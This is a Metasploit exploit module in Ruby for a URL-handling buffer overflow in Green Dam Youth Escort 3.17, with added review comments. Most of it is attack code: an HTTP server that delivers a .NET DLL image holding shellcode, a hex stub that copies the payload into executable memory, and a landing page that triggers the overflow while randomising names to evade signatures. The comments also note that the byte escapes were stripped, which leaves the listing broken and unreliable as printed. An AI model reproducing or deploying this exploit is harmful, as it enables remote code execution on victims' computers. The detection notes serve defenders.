
greendam_url.rb.txt

Posted on 16 June 2009

##
# greendam_url.rb
#
# Green Dam URL Processing Buffer Overflow exploit for the Metasploit Framework
#
# Green Dam Youth Escort 3.17 successfully exploited on the following platforms:
# - Internet Explorer 6, Windows XP SP2
# - Internet Explorer 7, Windows XP SP3
# - Internet Explorer 7, Windows Vista SP1
#
# .NET binary is used to bypass DEP and ASLR
#
# Trancer
# http://www.rec-sec.com
##

# NOTE(review): this listing appears to have lost its backslash escape
# characters when it was published (e.g. "x00" where a byte escape was
# intended) and all original line breaks. As printed, the string literals
# below are plain ASCII text, so the module is not runnable as shown.

require 'msf/core'

# Browser exploit module for Green Dam Youth Escort 3.17.
#
# Runs as an HTTP server (HttpServer::HTML mixin). A client request is handled
# in one of two ways by on_request_uri:
#   - a URI ending in "dll" is answered with a .NET memory image
#     (Rex::Text.to_dotnetmem) that carries the encoded payload, served as
#     application/x-msdownload;
#   - any other URI is answered with an HTML page whose <object> tag references
#     that DLL resource and whose onload script navigates to a 2035-character
#     URL, which is the overly long URL the description refers to.
#
# Network-visible artefacts a defender can key on (all visible in the code
# below): a response with Content-Type application/x-msdownload for a path of
# the form <resource>/generic-<unix time>.dll, an HTML body with
# classid="...dll#GenericControl", and a follow-up request for a path made of
# 2035 "$" characters followed by ".html".
class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::HttpServer::HTML

  # Registers module metadata with the framework.
  #
  # @param info [Hash] base info merged by update_info; callers normally pass
  #   nothing and rely on the defaults below.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Green Dam URL Processing Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow in Green Dam Youth Escort
        version 3.17 in the way it handles overly long URLs.
        By setting an overly long URL, an attacker can overrun a buffer and execute
        arbitrary code.
        This module uses the .NET DLL memory technique by Alexander Sotirov and
        Mark Dowd and should bypass DEP, NX and ASLR.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Trancer <mtrancer[at]gmail.com>' ],
      'Version'        => '$Revision:$',
      'References'     =>
        [
          ['URL', 'http://www.cse.umich.edu/~jhalderm/pub/gd/'],    # Analysis of the Green Dam Censorware System
          ['URL', 'http://www.milw0rm.com/exploits/8938'],           # Original exploit by seer[N.N.U]
          ['URL', 'http://taossa.com/archive/bh08sotirovdowd.pdf'], # .NET DLL memory technique
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 1000,
          # NOTE(review): printed without its escape character; as written this
          # is the three-character string "x00", not a single NUL byte.
          'BadChars' => "x00",
          'Compat'   =>
            {
              'ConnectionType' => '-find',
            },
          'StackAdjustment' => -3500,
          # Temporary stub virtualalloc() + memcpy() payload to RWX page
          # NOTE(review): same escape-stripping applies to every segment below;
          # as printed these are literal ASCII strings.
          'PrependEncoder' =>
            "xe8x56x00x00x00x53x55x56x57x8bx6cx24x18x8bx45x3c"+
            "x8bx54x05x78x01xeax8bx4ax18x8bx5ax20x01xebxe3x32"+
            "x49x8bx34x8bx01xeex31xffxfcx31xc0xacx38xe0x74x07"+
            "xc1xcfx0dx01xc7xebxf2x3bx7cx24x14x75xe1x8bx5ax24"+
            "x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8bx01xe8"+
            "xebx02x31xc0x5fx5ex5dx5bxc2x08x00x5ex6ax30x59x64"+
            "x8bx19x8bx5bx0cx8bx5bx1cx8bx1bx8bx5bx08x53x68x54"+
            "xcaxafx91xffxd6x6ax40x5ex56xc1xe6x06x56xc1xe6x08"+
            "x56x6ax00xffxd0x89xc3xebx0dx5ex89xdfxb9xe8x03x00"+
            "x00xfcxf3xa4xffxe3xe8xeexffxffxff"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { }],
        ],
      'DisclosureDate' => 'Jun 11 2009',
      'DefaultTarget'  => 0))
  end

  # Serves either the .NET DLL image or the HTML landing page, depending on
  # the requested URI. Called by the HttpServer mixin for every request.
  #
  # @param cli [Object] connected client; peerhost/peerport are read for
  #   logging and the object is handed to send_response and handler.
  # @param request [Object] parsed request; only request.uri is inspected.
  # @return [nil] responds via send_response; returns early without a response
  #   if regenerate_payload yields nil.
  def on_request_uri(cli, request)
    # Image base the DLL is laid out at, and the address inside it where the
    # pointer table is placed (offset 0x2065 — presumably matched to the
    # to_dotnetmem layout; not verifiable from this file).
    ibase = 0x24240000
    vaddr = ibase + 0x2065

    # NOTE(review): the "." is not escaped, so this matches any character
    # before "dll" at the end of the URI, not only a literal dot.
    if (request.uri.match(/.dll$/i))
      print_status("Sending DLL to #{cli.peerhost}:#{cli.peerport}...")
      return if ((p = regenerate_payload(cli)) == nil)

      # First entry points to the table of pointers
      vtable = [ vaddr + 4 ].pack("V")

      # Address just past the 256-entry table (1 entry above + 255 below,
      # 4 bytes each); this is where p.encoded lands once appended.
      cbase = ibase + 0x2065 + (256 * 4)

      # Build a function table
      255.times { vtable << [cbase].pack("V") }

      # Append the shellcode
      vtable << p.encoded

      # Served as a downloadable binary with caching disabled; this
      # Content-Type/path combination is the most distinctive wire artefact.
      send_response(
        cli,
        Rex::Text.to_dotnetmem(ibase, vtable),
        {
          'Content-Type' => 'application/x-msdownload',
          'Connection'   => 'close',
          'Pragma'       => 'no-cache'
        }
      )
      return
    end

    print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...")

    # Randomised identifiers so the script body differs per request
    # (defeats naive static signatures on variable/function names; the
    # 2035-iteration loop and the "$" filler remain constant).
    j_function = rand_text_alpha(rand(100)+1)
    j_url      = rand_text_alpha(rand(100)+1)
    j_counter  = rand_text_alpha(rand(30)+2)

    # The <object> classid points back at this server's own resource with a
    # generic-<epoch>.dll name, which routes the browser's fetch into the
    # DLL branch above. The onload script builds a 2035-character "$" string
    # and navigates to it with ".html" appended.
    # NOTE(review): the second <object> is an opening tag; presumably
    # </object> was intended.
    html = %Q|<html>
<head>
<script language="javascript">
function #{j_function}() {
  var #{j_url}='';
  for(var #{j_counter}=1;#{j_counter}<=2035;#{j_counter}++)
    #{j_url}+='$';
  window.location=#{j_url}+'.html';
}
</script>
</head>
<body onload="#{j_function}()">
<object classid="#{get_resource + "/generic-" + Time.now.to_i.to_s + ".dll"}#GenericControl">
<object>
</body>
</html>
|

    # Transmit the HTML response to the client (the original comment said
    # "compressed", but no compression is applied here).
    send_response(cli, html, { 'Content-Type' => 'text/html' })

    # Handle the payload
    handler(cli)
  end

end

